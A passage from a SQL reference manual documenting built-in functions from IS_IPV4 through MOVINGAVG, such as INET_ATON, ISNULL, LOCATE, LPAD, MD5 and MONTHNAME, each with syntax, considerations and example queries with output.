valid\r\nIPv4 string, and 0 for the second input argument, since 256 is out of\r\nrange for an IPv4 octet.\r\n\r\n```\r\n>>SELECT IS_IPV4('10.0.5.9'), IS_IPV4('10.0.5.256') from dual;\r\n\r\n(EXPR) (EXPR)\r\n------- -------\r\n1 0\r\n```\r\n<<<\r\n[[is_ipv6_function]]\r\n== IS_IPV6 Function\r\n\r\nReturns 1 if the argument is a valid IPv6 address specified as a string, 0 otherwise.\r\nThis function does not consider IPv4 addresses to be valid IPv6 addresses.\r\n\r\n```\r\nIS_IPV6( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nvalidation of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, IS_IPV6 returns NULL.\r\nSee <<expressions,Expressions>>.
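\r\n\r\nBecause IS_IPV4 and IS_IPV6 each return 1 or 0, the two checks can be\r\ncombined to accept an address of either family; the table hosts and its\r\ncolumn addr in this sketch are hypothetical:\r\n\r\n```\r\nSELECT addr\r\nFROM hosts\r\nWHERE IS_IPV4(addr) = 1 OR IS_IPV6(addr) = 1;\r\n```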
\r\n\r\n[[examples_of_is_ipv6]]\r\n=== Examples of IS_IPV6\r\n\r\nThis function returns 0 for the first input argument, since '10.0.5.9' is\r\nan IPv4 string rather than a valid IPv6 string, and 1 for the second\r\ninput argument, since '::1' is a valid IPv6 string.\r\n\r\n```\r\n>>SELECT IS_IPV6('10.0.5.9'), IS_IPV6('::1') from dual;\r\n\r\n(EXPR) (EXPR)\r\n-------- -------\r\n0 1\r\n```\r\n<<<\r\n[[inet_aton_function]]\r\n== INET_ATON Function\r\n\r\nGiven the dotted-quad representation of an IPv4 network address as a string,\r\nreturns an integer that represents the numeric value of the address in network\r\nbyte order (big endian). INET_ATON() returns NULL if it does not understand its argument.\r\n\r\n```\r\nINET_ATON( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nconversion of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, INET_ATON returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_inet_aton]]\r\n=== Examples of INET_ATON\r\n\r\n```\r\n>>SELECT INET_ATON('10.0.5.9') from dual;\r\n\r\n(EXPR)\r\n-----------\r\n167773449\r\n```\r\n<<<\r\n[[inet_ntoa_function]]\r\n== INET_NTOA Function\r\n\r\nGiven a numeric IPv4 network address in network byte order, returns the\r\ndotted-quad string representation of the address as a nonbinary string in\r\nthe connection character set. INET_NTOA() returns NULL if it does\r\nnot understand its argument.\r\n\r\n```\r\nINET_NTOA( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nconversion of the number to IP address. The _expression_ cannot contain\r\nan aggregate function or a subquery. If the input value is NULL, INET_NTOA\r\nreturns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_inet_ntoa]]\r\n=== Examples of INET_NTOA\r\n\r\nThis function converts an integer into the dotted-quad string\r\nrepresentation of the IP address.\r\n\r\n```\r\n>>SELECT INET_NTOA(167773449) from dual;\r\n\r\n(EXPR)\r\n-------------\r\n'10.0.5.9'\r\n```\r\n<<<\r\n[[isnull_function]]\r\n== ISNULL Function\r\n\r\nThe ISNULL function returns the value of the first argument if it is not\r\nnull; otherwise, it returns the value of the second argument. 
Both\r\nexpressions must be of comparable types.\r\n\r\nISNULL is a {project-name} SQL extension.\r\n\r\n```\r\nISNULL(ck-expr, repl-value)\r\n```\r\n\r\n* `_ck-expr_`\r\n+\r\nan expression of any valid SQL data type.\r\n\r\n* `_repl-value_`\r\n+\r\nan expression of any valid SQL data type, but must be a comparable type\r\nwith that of _ck-expr_.\r\n\r\n[[examples_of_isnull]]\r\n=== Examples of ISNULL\r\n\r\n* This function returns a 0 instead of a null if value is null.\r\n+\r\n```\r\nISNULL(value,0)\r\n```\r\n\r\n* This function returns the date constant if date_col is null.\r\n+\r\n```\r\nISNULL(date_col, DATE '2006-01-01')\r\n```\r\n\r\n* This function returns 'Smith' if the string column last_name is null.\r\n+\r\n```\r\nISNULL(last_name, 'Smith')\r\n```\r\n\r\n<<<\r\n[[juliantimestamp_function]]\r\n== JULIANTIMESTAMP Function\r\n\r\nThe JULIANTIMESTAMP function converts a datetime value into a 64-bit\r\nJulian timestamp value that represents the number of microseconds that\r\nhave elapsed between 4713 B.C., January 1, 00:00, and the specified\r\ndatetime value. JULIANTIMESTAMP returns a value of data type LARGEINT.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nJULIANTIMESTAMP is a {project-name} SQL extension.\r\n\r\n```\r\nJULIANTIMESTAMP(datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a value of type DATE, TIME, or\r\nTIMESTAMP. If _datetime-expression_ does not contain all the fields from YEAR through\r\nSECOND, {project-name} SQL extends the value before converting it to a Julian\r\ntimestamp. Datetime fields to the left of the specified datetime value\r\nare set to current date fields. Datetime fields to the right of the\r\nspecified datetime value are set to zero. See\r\n<<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_juliantimestamp]]\r\n=== Considerations for JULIANTIMESTAMP\r\n\r\nThe _datetime-expression_ value must be a date or timestamp value from\r\nthe beginning of year 0001 to the end of year 9999.\r\n\r\n[[examples_of_juliantimestamp]]\r\n=== Examples of JULIANTIMESTAMP\r\n\r\nThe project table consists of five columns using the data types NUMERIC,\r\nVARCHAR, DATE, TIMESTAMP, and INTERVAL.\r\n\r\n* Convert the TIMESTAMP value into a Julian timestamp representation:\r\n+\r\n```\r\nSELECT ship_timestamp, JULIANTIMESTAMP (ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nSHIP_TIMESTAMP (EXPR)\r\n-------------------------- --------------------\r\n2008-04-21 08:15:00.000000 212075525700000000\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Convert the DATE value into a Julian timestamp representation:\r\n+\r\n```\r\nSELECT start_date, JULIANTIMESTAMP (start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nSTART_DATE (EXPR)\r\n---------- --------------------\r\n2008-04-10 212074545600000000\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[lastnotnull_function]]\r\n== LASTNOTNULL Function\r\n\r\nThe LASTNOTNULL function is a sequence function that returns the last\r\nnon-null value of a column in an intermediate result table ordered by a\r\nSEQUENCE BY clause in a SELECT statement. 
See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nLASTNOTNULL is a {project-name} SQL extension.\r\n\r\n```\r\nLASTNOTNULL(column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If only null values have been returned, LASTNOTNULL returns null.\r\n\r\n[[examples_of_lastnotnull]]\r\n=== Examples of LASTNOTNULL\r\n\r\n* Return the last non-null value of a column:\r\n+\r\n```\r\nSELECT LASTNOTNULL(I1) AS lastnotnull\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nlastnotnull\r\n-----------\r\n 6215\r\n 6215\r\n 19058\r\n 19058\r\n 11966\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[lcase_function]]\r\n== LCASE Function\r\n\r\nThe LCASE function down-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, LCASE returns the same character. LCASE can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the LCASE function is equal to\r\nthe result returned by the <<lower_function,LOWER Function>>.\r\n\r\nLCASE returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nLCASE is a {project-name} SQL extension.\r\n\r\n```\r\nLCASE (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to down-shift. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_lcase]]\r\n=== Examples of LCASE\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return it in uppercase and lowercase letters\r\nby using the UCASE and LCASE functions:\r\n+\r\n```\r\nSELECT custname,UCASE(custname),LCASE(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n--------------- --------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<ucase_function,UCASE Function>>.\r\n\r\n<<<\r\n[[left_function]]\r\n== LEFT Function\r\n\r\nThe LEFT function returns the leftmost specified number of characters\r\nfrom a character expression. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nLEFT is a {project-name} SQL extension.\r\n\r\n```\r\nLEFT (character-expr, count)\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the leftmost specified\r\nnumber of characters. 
The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n+\r\nspecifies the number of characters to return from _character-expr_.\r\nThe number _count_ must be a value of exact numeric data type greater\r\nthan or equal to 0 with a scale of zero.\r\n\r\n[[examples_of_left]]\r\n=== Examples of LEFT\r\n\r\n* Return 'robert':\r\n+\r\n```\r\nleft('robert john smith', 6)\r\n```\r\n\r\n* Use the LEFT function to append the company name to the job\r\ndescriptions:\r\n+\r\n```\r\nUPDATE persnl.job SET jobdesc = LEFT (jobdesc, 11) ||' COMNET';\r\n\r\nSELECT jobdesc FROM persnl.job;\r\n\r\nJob Description\r\n------------------\r\nMANAGER COMNET\r\nPRODUCTION COMNET\r\nASSEMBLER COMNET\r\nSALESREP COMNET\r\nSYSTEM ANAL COMNET\r\nENGINEER COMNET\r\nPROGRAMMER COMNET\r\nACCOUNTANT COMNET\r\nADMINISTRAT COMNET\r\nSECRETARY COMNET\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[locate_function]]\r\n== LOCATE Function\r\n\r\nThe LOCATE function searches for a given substring in a character\r\nstring. If the substring is found, {project-name} SQL returns the character\r\nposition of the substring within the string. Every character, including\r\nmulti-byte characters, is treated as one character. The result returned\r\nby the LOCATE function is equal to the result returned by the\r\n<<position_function,POSITION Function>>.\r\n\r\nLOCATE is a {project-name} SQL extension.\r\n\r\n```\r\nLOCATE(substring-expression,source-expression)\r\n```\r\n\r\n* `_substring-expression_`\r\n+\r\nis an SQL character value expression that specifies the substring to\r\nsearch for in _source-expression_. The _substring-expression_ cannot be NULL.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_source-expression_`\r\n+\r\nis an SQL character value expression that specifies the source string.\r\nThe _source-expression_ cannot be null.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n{project-name} SQL returns the result as a 2-byte signed integer with a scale\r\nof zero. If _substring-expression_ is not found in _source-expression_, {project-name}\r\nSQL returns 0.\r\n\r\n[[considerations_for_locate]]\r\n=== Considerations for LOCATE\r\n\r\n[[result_of_locate]]\r\n==== Result of LOCATE\r\n\r\n* If the length of _source-expression_ is zero and the length of\r\n_substring-expression_ is greater than zero, {project-name} SQL returns 0.\r\n* If the length of _substring-expression_ is zero, {project-name} SQL returns 1.\r\n* If the length of _substring-expression_ is greater than the length of\r\n_source-expression_, {project-name} SQL returns 0.\r\n* If _source-expression_ is a null value, {project-name} SQL returns a null value.\r\n\r\n[[using_ucase]]\r\n==== Using UCASE\r\n\r\nTo ignore case in the search, use the UCASE function (or the LCASE\r\nfunction) for both the _substring-expression_ and the _source-expression_.\r\n\r\n[[examples_of_locate]]\r\n=== Examples of LOCATE\r\n\r\n* Return the value 8 for the position of the substring 'John' within the string:\r\n+\r\n```\r\nLOCATE ('John','Robert John Smith')\r\n```\r\n\r\n* Suppose that the EMPLOYEE table has an EMPNAME column that contains\r\nboth the first and last names. 
This SELECT statement returns all records\r\nin table EMPLOYEE that contain the substring 'SMITH', regardless of\r\nwhether the column value is in uppercase or lowercase characters:\r\n+\r\n```\r\nSELECT * FROM persnl.employee\r\nWHERE LOCATE ('SMITH',UCASE(empname)) > 0 ;\r\n```\r\n\r\n<<<\r\n[[log_function]]\r\n== LOG Function\r\n\r\nThe LOG function returns the natural logarithm of a numeric value\r\nexpression. LOG is a {project-name} SQL extension.\r\n\r\n```\r\nLOG (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the LOG function. The value of the argument must be greater\r\nthan zero. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_log]]\r\n=== Examples of LOG\r\n\r\n* This function returns the value 6.93147180559945344e-001, or\r\napproximately 0.69315:\r\n+\r\n```\r\nLOG (2.0)\r\n```\r\n\r\n<<<\r\n[[log10_function]]\r\n== LOG10 Function\r\n\r\nThe LOG10 function returns the base 10 logarithm of a numeric value\r\nexpression.\r\n\r\nLOG10 is a {project-name} SQL extension.\r\n\r\n```\r\nLOG10 (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the LOG10 function. The value of the argument must be\r\ngreater than zero.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_log10]]\r\n=== Examples of LOG10\r\n\r\n* This function returns the value 1.39794000867203776E+000, or\r\napproximately 1.3979:\r\n+\r\n```\r\nLOG10 (25)\r\n```\r\n\r\n<<<\r\n[[lower_function]]\r\n== LOWER Function\r\n\r\nThe LOWER function down-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, LOWER returns the same character. LOWER can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the LOWER function is equal to\r\nthe result returned by the <<lcase_function,LCASE Function>>.\r\n\r\nLOWER returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\n```\r\nLOWER (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to down-shift.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_lower]]\r\n=== Considerations for LOWER\r\n\r\nFor a UTF8 character expression, the LOWER function down-shifts all the\r\nuppercase or title case characters in a given string to lowercase and\r\nreturns a character string with the same data type and character set as\r\nthe argument.\r\n\r\nA lowercase character is a character that has the \"alphabetic\" property\r\nin the Unicode Standard 2 and whose Unicode name includes _lower_. An uppercase\r\ncharacter is a character that has the \"alphabetic\" property in the\r\nUnicode Standard 2 and whose Unicode name includes _upper_. A title\r\ncase character is a character that has the Unicode \"alphabetic\" property\r\nand whose Unicode name includes _title_.
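\r\n\r\nAs a sketch of the UTF8 behavior (the _UTF8 literal prefix is shown here\r\nonly as an assumption about how a UTF8 string reaches the function),\r\nboth the accented and the plain uppercase letters are down-shifted:\r\n\r\n```\r\nLOWER (_UTF8'École')\r\n```\r\n\r\nThe result is 'école'.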
\r\n\r\n<<<\r\n[[examples_of_lower]]\r\n=== Examples of LOWER\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return the result in uppercase and\r\nlowercase letters by using the UPPER and LOWER functions:\r\n+\r\n```\r\nSELECT custname,UPPER(custname),LOWER(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ---------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n\r\nSee <<upper_function,UPPER Function>>.\r\n\r\n<<<\r\n[[lpad_function]]\r\n== LPAD Function\r\n\r\nThe LPAD function pads the left side of a string with the specified\r\nstring. Every character in the string, including multi-byte characters,\r\nis treated as one character.\r\n\r\nLPAD is a {project-name} SQL extension.\r\n\r\n```\r\nLPAD (str, len [,padstr])\r\n```\r\n\r\n* `_str_`\r\n+\r\ncan be an expression.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_len_`\r\n+\r\nidentifies the desired number of characters to be returned and can be an\r\nexpression but must be an integral value. If _len_ is equal to the\r\nlength of the string, no change is made. If _len_ is smaller than the\r\nstring size, the string is truncated.\r\n\r\n* `_padstr_`\r\n+\r\nspecifies the string used to pad the left side of _str_; it can be an\r\nexpression. If _padstr_ is omitted, spaces are used for padding.\r\n\r\n[[examples_of_lpad]]\r\n=== Examples of LPAD\r\n\r\n* This function returns '   kite':\r\n+\r\n```\r\nLPAD('kite', 7)\r\n```\r\n\r\n* This function returns 'ki':\r\n+\r\n```\r\nLPAD('kite', 2)\r\n```\r\n\r\n* This function returns '0000kite':\r\n+\r\n```\r\nLPAD('kite', 8, '0')\r\n```\r\n\r\n* This function returns 'go fly a kite':\r\n+\r\n```\r\nLPAD('go fly a kite', 13, 'z')\r\n```\r\n\r\n* This function returns 'John,John,go fly a kite':\r\n+\r\n```\r\nLPAD('go fly a kite', 23, 'John,')\r\n```\r\n\r\n<<<\r\n[[ltrim_function]]\r\n== LTRIM Function\r\n\r\nThe LTRIM function removes leading spaces from a character string. If\r\nyou must remove any leading character other than space, use the TRIM\r\nfunction and specify the value of the character. See the <<trim_function,TRIM Function>>.\r\n\r\nLTRIM is a {project-name} SQL extension.\r\n\r\n```\r\nLTRIM (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim leading spaces.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ltrim]]\r\n=== Considerations for LTRIM\r\n\r\n[[result_of_ltrim]]\r\n==== Result of LTRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _character-expression_.\r\n\r\n[[examples_of_ltrim]]\r\n=== Examples of LTRIM\r\n\r\n* Return 'Robert ':\r\n+\r\n```\r\nLTRIM (' Robert ')\r\n```\r\n\r\nSee <<trim_function,TRIM Function>> and <<rtrim_function,RTRIM Function>>.\r\n\r\n<<<\r\n[[max_function]]\r\n== MAX\/MAXIMUM Function\r\n\r\nMAX is an aggregate function that returns the maximum value within a set\r\nof values. MAXIMUM is the equivalent of MAX wherever the function name\r\nMAX appears within a statement. 
The data type of the result is the same\r\nas the data type of the argument.\r\n\r\n```\r\nMAX | MAXIMUM ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe maximum of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the MAX\/MAXIMUM function is\r\napplied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the maximum. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the\r\nMAX\/MAXIMUM function operates on distinct values from the one-column\r\ntable derived from the evaluation of _expression_. All nulls are\r\neliminated before the function is applied to the set of values. If the\r\nresult table is empty, MAX\/MAXIMUM returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[considerations_for_max]]\r\n=== Considerations for MAX\/MAXIMUM\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table\r\nbut cannot include an aggregate function. These expressions are valid:\r\n\r\n```\r\nMAX (SALARY)\r\nMAX (SALARY * 1.1)\r\nMAX (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[examples_of_max]]\r\n=== Examples of MAX\/MAXIMUM\r\n\r\n* Display the maximum value in the SALARY column:\r\n+\r\n```\r\nSELECT MAX (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 175500.00\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[md5_function]]\r\n== MD5 Function\r\n\r\nCalculates an MD5 128-bit checksum for the string. The value is returned\r\nas a string of 32 hexadecimal digits, or NULL if the argument was NULL.\r\n\r\n```\r\nMD5( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the MD5. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, MD5 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_md5]]\r\n=== Examples of MD5\r\n\r\nThe return value is a nonbinary string in the connection character set.\r\n\r\n```\r\n>>SELECT MD5('testing') from dual;\r\n\r\n(EXPR)\r\n---------------------------------\r\n'ae2b1fca515949e5d54fb22b8ed95575'\r\n```\r\n\r\n<<<\r\n[[min_function]]\r\n== MIN Function\r\n\r\nMIN is an aggregate function that returns the minimum value within a set\r\nof values. The data type of the result is the same as the data type of\r\nthe argument.\r\n\r\n```\r\nMIN ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe minimum of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the MIN function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the minimum. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the MIN\r\nfunction operates on distinct values from the one-column table derived\r\nfrom the evaluation of _expression_. All nulls are eliminated before\r\nthe function is applied to the set of values. 
If the result table is\r\nempty, MIN returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[considerations_for_min]]\r\n=== Considerations for MIN\r\n\r\n[[operands_of_the_expression_3]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable but cannot include an aggregate function. These expressions are\r\nvalid:\r\n\r\n```\r\nMIN (SALARY)\r\nMIN (SALARY * 1.1)\r\nMIN (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n<<<\r\n[[examples_of_min]]\r\n=== Examples of MIN\r\n\r\n* Display the minimum value in the SALARY column:\r\n+\r\n```\r\nSELECT MIN (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 17000.00\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[minute_function]]\r\n== MINUTE Function\r\n\r\nThe MINUTE function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value, in the range 0 through 59, that represents the\r\ncorresponding minute of the hour.\r\n\r\nMINUTE is a {project-name} SQL extension.\r\n\r\n```\r\nMINUTE (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_minute]]\r\n=== Examples of MINUTE\r\n\r\n* Return an integer that represents the minute of the hour from the\r\nship timestamp column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MINUTE(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 15\r\n```\r\n\r\n<<<\r\n[[mod_function]]\r\n== MOD Function\r\n\r\nThe MOD function returns the remainder (modulus) of an integer value\r\nexpression divided by an integer value expression.\r\n\r\nMOD is a {project-name} SQL extension.\r\n\r\n```\r\nMOD (integer-expression-1,integer-expression-2)\r\n```\r\n\r\n* `_integer-expression-1_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT, INTEGER, or\r\nLARGEINT that specifies the value for the dividend argument of the MOD\r\nfunction.\r\n\r\n* `_integer-expression-2_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT, INTEGER, or\r\nLARGEINT that specifies the value for the divisor argument of the MOD\r\nfunction. The divisor argument cannot be zero.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_mod]]\r\n=== Examples of MOD\r\n\r\n* This function returns the value 2 as the remainder or modulus:\r\n+\r\n```\r\nMOD(11,3)\r\n```\r\n\r\n<<<\r\n[[month_function]]\r\n== MONTH Function\r\n\r\nThe MONTH function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 12 that represents the\r\ncorresponding month of the year.\r\n\r\nMONTH is a {project-name} SQL extension.\r\n\r\n```\r\nMONTH (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. 
\r\n<<<\r\n[[month_function]]\r\n== MONTH Function\r\n\r\nThe MONTH function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 12 that represents the\r\ncorresponding month of the year.\r\n\r\nMONTH is a {project-name} SQL extension.\r\n\r\n```\r\nMONTH (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_month]]\r\n=== Examples of MONTH\r\n\r\n* Return an integer that represents the month of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MONTH(start_date) FROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 4\r\n```\r\n\r\n<<<\r\n[[monthname_function]]\r\n== MONTHNAME Function\r\n\r\nThe MONTHNAME function converts a DATE or TIMESTAMP expression into a\r\ncharacter literal that is the name of the month of the year (January,\r\nFebruary, and so on).\r\n\r\nMONTHNAME is a {project-name} SQL extension.\r\n\r\n```\r\nMONTHNAME (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_monthname]]\r\n=== Considerations for MONTHNAME\r\n\r\nThe MONTHNAME function returns the name of the month in ISO8859-1.\r\n\r\n[[examples_of_monthname]]\r\n=== Examples of MONTHNAME\r\n\r\n* Return a character literal that is the month of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MONTHNAME(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ---------\r\n2008-04-10 2008-04-21 08:15:00.000000 April\r\n```\r\n\r\n<<<\r\n[[movingavg_function]]\r\n== MOVINGAVG Function\r\n\r\nThe MOVINGAVG function is a sequence function that returns the average\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGAVG is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGAVG(column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size (a sketch follows this list):\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGAVG returns the same result as\r\nRUNNINGAVG:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.
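\r\nThe following sketch (not from the original manual) illustrates how _integer-expression_ and _max-rows_ interact:\r\n\r\n```\r\n-- The effective window size is min(3, 2) = 2, so each average covers\r\n-- the current row and at most one preceding row.\r\nSELECT MOVINGAVG(I1, 3, 2) AS capped_avg\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```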
